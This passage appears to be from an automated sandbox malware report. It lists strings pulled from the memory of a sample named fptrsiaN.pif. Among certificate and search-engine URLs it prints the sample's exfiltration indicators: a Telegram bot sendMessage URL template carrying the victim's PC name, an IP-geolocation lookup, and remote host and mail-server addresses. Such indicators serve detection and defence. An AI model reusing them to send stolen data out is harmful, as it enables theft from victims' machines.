Source: fptrsiaN.pif, 00000006.00000002.2987999528.000000001B358000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2987999528.000000001B316000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2987999528.000000001B2D5000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D41F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D42B000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011468270.000000001F922000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.2999173712.0000000020036000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F08000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021EFE000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3013384079.0000000024DE0000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.2430924168.0000000024E63000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000312A5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.0000000031298000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3013802889.0000000033EC7000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2997234899.000000002F111000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://e6.o.lencr.org0
Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D41F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D42B000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F08000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021EEC000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000312A5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.0000000031298000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.irco.com.sa
Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D2A1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021D91000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000310F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: fptrsiaN.pif, 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D2A1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021D91000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000310F1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: x.exe, 00000001.00000003.1703545154.000000007EFE3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1702919299.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1723017408.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.00000000208AD000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1754307432.0000000021090000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.00000000207D0000.00000004.00001000.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000000.1720302814.0000000000416000.00000002.00000001.01000000.00000007.sdmp, fptrsiaN.pif, 0000000A.00000000.1837230094.0000000000416000.00000002.00000001.01000000.00000007.sdmp, fptrsiaN.pif, 0000000F.00000000.1911866469.0000000000416000.00000002.00000001.01000000.00000007.sdmp, fptrsiaN.pif.1.dr	String found in binary or memory: http://www.pmail.com
Source: fptrsiaN.pif, 00000006.00000002.2987999528.000000001B358000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2987999528.000000001B316000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D41F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D42B000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011468270.000000001F922000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.2999173712.0000000020036000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F08000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021EFE000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3013384079.0000000024DE0000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.2430924168.0000000024E63000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000312A5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.0000000031298000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3013802889.0000000033EC7000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.2480370892.0000000033F00000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2997234899.000000002F111000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: fptrsiaN.pif, 0000000A.00000002.2999173712.0000000020036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/
Source: fptrsiaN.pif, 00000006.00000002.2987999528.000000001B358000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2987999528.000000001B316000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D41F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D42B000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011468270.000000001F922000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.2999173712.0000000020036000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F08000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021EFE000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3013384079.0000000024DE0000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.2430924168.0000000024E63000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000312A5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.0000000031298000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3013802889.0000000033EC7000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.2480370892.0000000033F00000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2997234899.000000002F111000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E626000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E5F4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000230E4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023116000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032476000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032444000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: fptrsiaN.pif, 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20a
Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E626000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E5F4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000230E4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023116000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032476000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032444000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E626000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E5F4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000230E4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023116000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032476000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032444000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E626000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E5F4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000230E4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023116000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032476000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032444000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F2E000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F5F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000312FB000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enLz
Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E626000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E5F4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000230E4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023116000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032476000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032444000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E626000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E5F4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000230E4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023116000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032476000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032444000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E626000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E5F4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000230E4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023116000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032476000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032444000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D354000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311AC000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000310F1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: fptrsiaN.pif, 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D2F0000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021DE0000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000310F1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.000000003115D000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311A2000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311AC000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D354000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.1894
Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E47D000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E42F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E4A4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E6C5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E585000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E2CC000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022DBC000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F1F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F94000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000231B5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023075000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F6D000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032515000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311F8000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.000000003227F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000323D5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000322CD000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.000000003211C000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000322F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E47F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E67E000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E560000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E2A7000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E40A000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E435000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.000000002316D000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F25000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F6F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023050000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022EFA000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022D97000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000322CF000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000324CE000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.000000003225A000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000320F7000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000323B0000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032285000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E47D000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E42F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E4A4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E6C5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E585000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E2CC000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022DBC000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F1F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F94000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000231B5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023075000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F6D000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032515000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311F8000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.000000003227F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000323D5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000322CD000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.000000003211C000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000322F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E47F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E67E000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E560000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E2A7000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E40A000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E435000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.000000002316D000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F25000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F6F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023050000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022EFA000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022D97000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000322CF000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000324CE000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.000000003225A000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000320F7000.00000004.00000800.00020000.00000000.sdmp, 